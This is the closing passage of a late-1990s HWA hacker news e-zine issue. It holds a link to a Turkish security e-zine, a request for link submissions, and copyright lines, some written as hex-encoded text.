Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.






.za (South Africa) sites contributed by wyzwun tnx guy...




Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.

@HWA


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT